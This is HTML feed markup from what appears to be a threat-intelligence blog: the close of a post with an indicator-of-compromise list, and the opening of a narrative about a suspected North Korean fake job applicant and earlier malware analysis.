https://substackcdn.com/image/fetch/$s_!h8bZ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff2c879cc-bc14-4a26-be5f-f036ff11e6ef_4032x3024.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!h8bZ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff2c879cc-bc14-4a26-be5f-f036ff11e6ef_4032x3024.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!h8bZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff2c879cc-bc14-4a26-be5f-f036ff11e6ef_4032x3024.jpeg" width="484" height="645.2225274725274" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f2c879cc-bc14-4a26-be5f-f036ff11e6ef_4032x3024.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1941,&quot;width&quot;:1456,&quot;resizeWidth&quot;:484,&quot;bytes&quot;:1981700,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/187582368?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff2c879cc-bc14-4a26-be5f-f036ff11e6ef_4032x3024.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!h8bZ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff2c879cc-bc14-4a26-be5f-f036ff11e6ef_4032x3024.jpeg 424w, https://substackcdn.com/image/fetch/$s_!h8bZ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff2c879cc-bc14-4a26-be5f-f036ff11e6ef_4032x3024.jpeg 848w, https://substackcdn.com/image/fetch/$s_!h8bZ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff2c879cc-bc14-4a26-be5f-f036ff11e6ef_4032x3024.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!h8bZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff2c879cc-bc14-4a26-be5f-f036ff11e6ef_4032x3024.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Regards from the Quetzal Team &#10084;&#65039;&#128139;</figcaption></figure></div><div><hr></div><h2>Outro</h2><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Y8U2!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd2275d1a-ffaa-4396-94a3-6e00011d7acf_640x640.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Y8U2!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd2275d1a-ffaa-4396-94a3-6e00011d7acf_640x640.jpeg 424w, https://substackcdn.com/image/fetch/$s_!Y8U2!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd2275d1a-ffaa-4396-94a3-6e00011d7acf_640x640.jpeg 848w, https://substackcdn.com/image/fetch/$s_!Y8U2!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd2275d1a-ffaa-4396-94a3-6e00011d7acf_640x640.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!Y8U2!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd2275d1a-ffaa-4396-94a3-6e00011d7acf_640x640.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Y8U2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd2275d1a-ffaa-4396-94a3-6e00011d7acf_640x640.jpeg" width="214" height="214" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d2275d1a-ffaa-4396-94a3-6e00011d7acf_640x640.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:640,&quot;width&quot;:640,&quot;resizeWidth&quot;:214,&quot;bytes&quot;:59903,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/187582368?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd2275d1a-ffaa-4396-94a3-6e00011d7acf_640x640.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Y8U2!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd2275d1a-ffaa-4396-94a3-6e00011d7acf_640x640.jpeg 424w, https://substackcdn.com/image/fetch/$s_!Y8U2!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd2275d1a-ffaa-4396-94a3-6e00011d7acf_640x640.jpeg 848w, https://substackcdn.com/image/fetch/$s_!Y8U2!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd2275d1a-ffaa-4396-94a3-6e00011d7acf_640x640.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!Y8U2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd2275d1a-ffaa-4396-94a3-6e00011d7acf_640x640.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">Threat Stuntman&#8217;s profile picture taken from social media</figcaption></figure></div><p>I&#8217;m not the <a href="https://en.wikipedia.org/wiki/Empath">empath</a> type, but sometimes I like to put myself in the Threat Actor&#8217;s shoes.</p><p>Try it, just <strong>for a second</strong>.</p><blockquote><p>It all looked so good. The perfect plan.</p><p>You were gonna be rich. It was your last &#8220;job&#8221; with the boys.</p><p>One last run, and you&#8217;d all retire to Cayman, Belize, Seychelles, Palau, you name it.</p><p>You&#8217;re counting the money in your head.</p><p>1300 BTC. Almost 100 million dollars.</p><p>You fantasize about anything with a price tag. And even things without one.</p><p>In your head, you&#8217;re already spending it.</p><p>But some weirdos with a green bird logo show up and call you a nerd.</p><p>There is no Cayman. There is no 1300 BTC.</p><p>The dream is gone.</p><p>You were so close!</p><p>But hey, at least you have a nice hand crafted sign for this Valentine.</p></blockquote><p></p><p>Moral of the story is:</p><p><strong>Don&#8217;t be a nerd. Spread love, not malware.</strong></p><p></p><p>Happy Valentine&#8217;s from Quetzal Team!</p><div><hr></div><h2>IOCs</h2><pre><code>IPv4:79.127.229.179
IPv4:15.220.188.32
IPv4:38.165.237.105
IPv4:46.62.158.224
IPv4:142.93.176.189
IPv4:3.85.167.157
URL:hxxps[:]//us05web[.]zoom[.]us/j/83413214716?pwd=KYKBnV0oDagfujaE3b5lmIFuKLmSwN.1
Phone:+525536865100
Phone:+528123396516</code></pre><div><hr></div><h2>References</h2><ul><li><p><strong><a href="https://otx.alienvault.com/pulse/698c7ed88819e50cbdf8b70b">LevelBlue OTX</a></strong><a href="https://otx.alienvault.com/pulse/698c7ed88819e50cbdf8b70b"> - Original Intelligence Pulse</a></p></li></ul><p></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!RNSM!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F16728f2c-1f61-4ac8-9976-347bf564f2cf_1280x1280.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!RNSM!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F16728f2c-1f61-4ac8-9976-347bf564f2cf_1280x1280.png 424w, https://substackcdn.com/image/fetch/$s_!RNSM!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F16728f2c-1f61-4ac8-9976-347bf564f2cf_1280x1280.png 848w, https://substackcdn.com/image/fetch/$s_!RNSM!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F16728f2c-1f61-4ac8-9976-347bf564f2cf_1280x1280.png 1272w, https://substackcdn.com/image/fetch/$s_!RNSM!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F16728f2c-1f61-4ac8-9976-347bf564f2cf_1280x1280.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!RNSM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F16728f2c-1f61-4ac8-9976-347bf564f2cf_1280x1280.png" width="200" height="200" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/16728f2c-1f61-4ac8-9976-347bf564f2cf_1280x1280.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1280,&quot;width&quot;:1280,&quot;resizeWidth&quot;:200,&quot;bytes&quot;:70380,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/187582368?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F16728f2c-1f61-4ac8-9976-347bf564f2cf_1280x1280.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!RNSM!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F16728f2c-1f61-4ac8-9976-347bf564f2cf_1280x1280.png 424w, https://substackcdn.com/image/fetch/$s_!RNSM!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F16728f2c-1f61-4ac8-9976-347bf564f2cf_1280x1280.png 848w, https://substackcdn.com/image/fetch/$s_!RNSM!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F16728f2c-1f61-4ac8-9976-347bf564f2cf_1280x1280.png 1272w, https://substackcdn.com/image/fetch/$s_!RNSM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F16728f2c-1f61-4ac8-9976-347bf564f2cf_1280x1280.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div>]]></content:encoded></item><item><title><![CDATA[Final Chapter: Interview with the Chollima VII]]></title><description><![CDATA[Canaries and Quetzals]]></description><link>https://quetzal.bitso.com/p/final-chapter-interview-with-the</link><guid isPermaLink="false">https://quetzal.bitso.com/p/final-chapter-interview-with-the</guid><dc:creator><![CDATA[Mauro Eldritch]]></dc:creator><pubDate>Mon, 15 Dec 2025 17:03:11 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!TI4p!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62ffee00-71dd-466a-96d4-b1f21905b764_3530x1924.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>It has been a long year. We have <s>tamed</s> <a href="https://linktr.ee/quetzalteam">interviewed</a> many Chollimas, torn apart <a href="https://quetzal.bitso.com/p/interview-with-the-chollima">plenty of their malware</a>, and even managed to secure ourselves a place within their ranks, documenting their <a href="https://any.run/cybersecurity-blog/lazarus-group-it-workers-investigation/">entire operation from the inside</a>. A wild year, indeed.</p><p>But all things must come to an end, and <strong>it is time to sunset this saga</strong>. That said, it should not be a sad moment, because <strong>we are giving it the ending it deserves</strong>.</p><p>So, as usual: <em>a North Korean walks into an interview</em>&#8230;</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!TI4p!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62ffee00-71dd-466a-96d4-b1f21905b764_3530x1924.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!TI4p!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62ffee00-71dd-466a-96d4-b1f21905b764_3530x1924.png 424w, https://substackcdn.com/image/fetch/$s_!TI4p!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62ffee00-71dd-466a-96d4-b1f21905b764_3530x1924.png 848w, https://substackcdn.com/image/fetch/$s_!TI4p!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62ffee00-71dd-466a-96d4-b1f21905b764_3530x1924.png 1272w, https://substackcdn.com/image/fetch/$s_!TI4p!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62ffee00-71dd-466a-96d4-b1f21905b764_3530x1924.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!TI4p!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62ffee00-71dd-466a-96d4-b1f21905b764_3530x1924.png" width="1456" height="794" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/62ffee00-71dd-466a-96d4-b1f21905b764_3530x1924.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:794,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:2074448,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/181261599?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62ffee00-71dd-466a-96d4-b1f21905b764_3530x1924.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!TI4p!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62ffee00-71dd-466a-96d4-b1f21905b764_3530x1924.png 424w, https://substackcdn.com/image/fetch/$s_!TI4p!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62ffee00-71dd-466a-96d4-b1f21905b764_3530x1924.png 848w, https://substackcdn.com/image/fetch/$s_!TI4p!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62ffee00-71dd-466a-96d4-b1f21905b764_3530x1924.png 1272w, https://substackcdn.com/image/fetch/$s_!TI4p!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62ffee00-71dd-466a-96d4-b1f21905b764_3530x1924.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div><hr></div><h2>C&#243;rdoba</h2><p>When you think of <a href="https://en.wikipedia.org/wiki/C&#243;rdoba,_Argentina">C&#243;rdoba, Argentina</a>, many things come to mind: the <a href="https://en.wikipedia.org/wiki/Cordob&#233;s_Spanish">accent</a>, the <a href="https://en.wikipedia.org/wiki/La_Mona_Jim&#233;nez">musicians</a>, the <a href="https://en.wikipedia.org/wiki/National_Beer_Festival">festivals</a>, the <a href="https://es.wikipedia.org/wiki/Reloj_Cucu_de_Villa_Carlos_Paz#/media/Archivo:RelojCucu11AM-CarlosPaz.jpg">cuckoo clock</a>, and even the <a href="https://en.wikipedia.org/wiki/Uritorco">UFO sightings</a>. The last thing you would expect is a North Korean cosplaying as a <em>cordob&#233;s</em>, yet here we are. If we worked only with <em>known knowns</em> and the predictable, this saga would not exist.</p><p>So that&#8217;s how we met <strong>Lucas Gabriel</strong>, a <em>north-cordob&#233;s</em> <strong>Senior Full Stack Engineer</strong> that applied for a position at our company.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!8_SF!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F647149fa-2c34-4a8c-b6e4-8096ddce4765_1476x402.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!8_SF!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F647149fa-2c34-4a8c-b6e4-8096ddce4765_1476x402.png 424w, https://substackcdn.com/image/fetch/$s_!8_SF!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F647149fa-2c34-4a8c-b6e4-8096ddce4765_1476x402.png 848w, https://substackcdn.com/image/fetch/$s_!8_SF!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F647149fa-2c34-4a8c-b6e4-8096ddce4765_1476x402.png 1272w, https://substackcdn.com/image/fetch/$s_!8_SF!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F647149fa-2c34-4a8c-b6e4-8096ddce4765_1476x402.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!8_SF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F647149fa-2c34-4a8c-b6e4-8096ddce4765_1476x402.png" width="522" height="142.33104395604394" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/647149fa-2c34-4a8c-b6e4-8096ddce4765_1476x402.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:397,&quot;width&quot;:1456,&quot;resizeWidth&quot;:522,&quot;bytes&quot;:52167,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/181261599?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F647149fa-2c34-4a8c-b6e4-8096ddce4765_1476x402.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!8_SF!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F647149fa-2c34-4a8c-b6e4-8096ddce4765_1476x402.png 424w, https://substackcdn.com/image/fetch/$s_!8_SF!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F647149fa-2c34-4a8c-b6e4-8096ddce4765_1476x402.png 848w, https://substackcdn.com/image/fetch/$s_!8_SF!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F647149fa-2c34-4a8c-b6e4-8096ddce4765_1476x402.png 1272w, https://substackcdn.com/image/fetch/$s_!8_SF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F647149fa-2c34-4a8c-b6e4-8096ddce4765_1476x402.png 1456w" sizes="100vw"></picture><div></div></div></a><figcaption class="image-caption">Lucas&#8217; Resume</figcaption></figure></div><p><strong>Sof&#237;a</strong>, our <strong>Talent Acquisition Specialist</strong>, met him for an interview, and things immediately stopped making sense. To begin with, <strong>Lucas</strong> seemed shy and refused to turn on his camera <strong>for reasons that will become clear later in this article.</strong></p><p>From that moment onwards, the interview was a <strong>complete disaster</strong>. Suspiciously, <em>he did not speak Spanish at all</em>. When <strong>Sof&#237;a</strong> encouraged him to switch to his native tongue, he excused himself by saying that he &#8220;wanted to improve his <em>engrish</em>&#8221; (sic).</p><p><strong>Sof&#237;a</strong> pressed on, insisting that the role required Spanish proficiency and that they needed to continue in Spanish. He reluctantly agreed, but after her first question he froze, as if struggling to understand what she had said, or perhaps <strong>waiting for an AI to auto-translate for him</strong>, something we had seen before. Unable to answer in a reasonable timeframe, he pushed again to continue the interview in English. When she declined, he simply vanished.</p><div class="native-video-embed" data-component-name="VideoPlaceholder" data-attrs="{&quot;mediaUploadId&quot;:&quot;1b614327-6d55-41d9-acdb-942a147ec0e1&quot;,&quot;duration&quot;:null}"></div><p>But that is not where the story ends. Notice what Sof&#237;a says at the end of the clip? For those who do not speak <em><a href="https://en.wikipedia.org/wiki/Miguel_de_Cervantes">Cervantes</a>&#8217; tongue</em>, like Lucas Gabriel, she says:</p><blockquote><p>&#8220;<em>Of course he&#8217;s already gone, but we got him</em>&#8221;</p></blockquote><p>and seems happy about it.</p><p>That is another detail that will become clear later on. Keep it in mind, together with the switched-off camera. <strong>Everything will add up in the end</strong>.</p><p>So far, for an <strong>APT</strong> (<a href="https://en.wikipedia.org/wiki/Advanced_persistent_threat">Advanced Persistent Threat</a>), the whole engagement seemed unusually easy on our side. It felt like fencing with an inexperienced opponent each time, or as if we had an <strong>advantage</strong> no one had <em>fully noticed</em> yet.</p><p>I lean towards the second explanation, and since we have many loyal readers who have followed this series to this very day, I think we both deserve an ending with our very own <em>parlour room scene </em>(*).</p><h6><em>(*) The classic climax where the detective gathers all suspects in a formal room (the parlour) to reveal clues, explain the crime step-by-step, and unmask the killer, solving the case.</em></h6><div><hr></div><h2>The Manual</h2><p>Many months ago, we started this series, <em><a href="https://linktr.ee/quetzalteam">Interview with the Chollima</a></em>, after a <strong>DPRK agent</strong> posing as <em>someone</em> from a crypto company<a href="https://quetzal.bitso.com/p/interview-with-the-chollima"> tried to spear-phish me</a> into &#8220;working&#8221; for him. My supposed task was to fix a &#8220;bug&#8221; in his code, which was in reality laced with a malware called <strong><a href="https://any.run/cybersecurity-blog/ottercookie-malware-analysis/">OtterCookie</a>, </strong>which would later deploy <strong><a href="https://any.run/cybersecurity-blog/invisibleferret-malware-analysis/">InvisibleFerret</a></strong> (another malware) as his sidekick.</p><p>In that first chapter, I explained how I fully reversed the malware, played along just enough for him to believe I had taken the bait, and used that to <strong>pull him into a call</strong> where I confronted and <strong>recorded</strong> <strong>him</strong>.</p><p>But that&#8217;s <em>not the whole story</em>, let&#8217;s take a few steps back. While reversing the malware, I discovered several domains referenced in the code. Scanning them revealed that he was <a href="https://quetzal.bitso.com/i/161100611/trying-to-catch-an-otter">running his services with </a><strong><a href="https://quetzal.bitso.com/i/161100611/trying-to-catch-an-otter">Administrator privileges</a></strong>, and that a port hosting <strong>Remote Desktop Protocol</strong> was also exposed on a particular domain.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!BkvE!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" 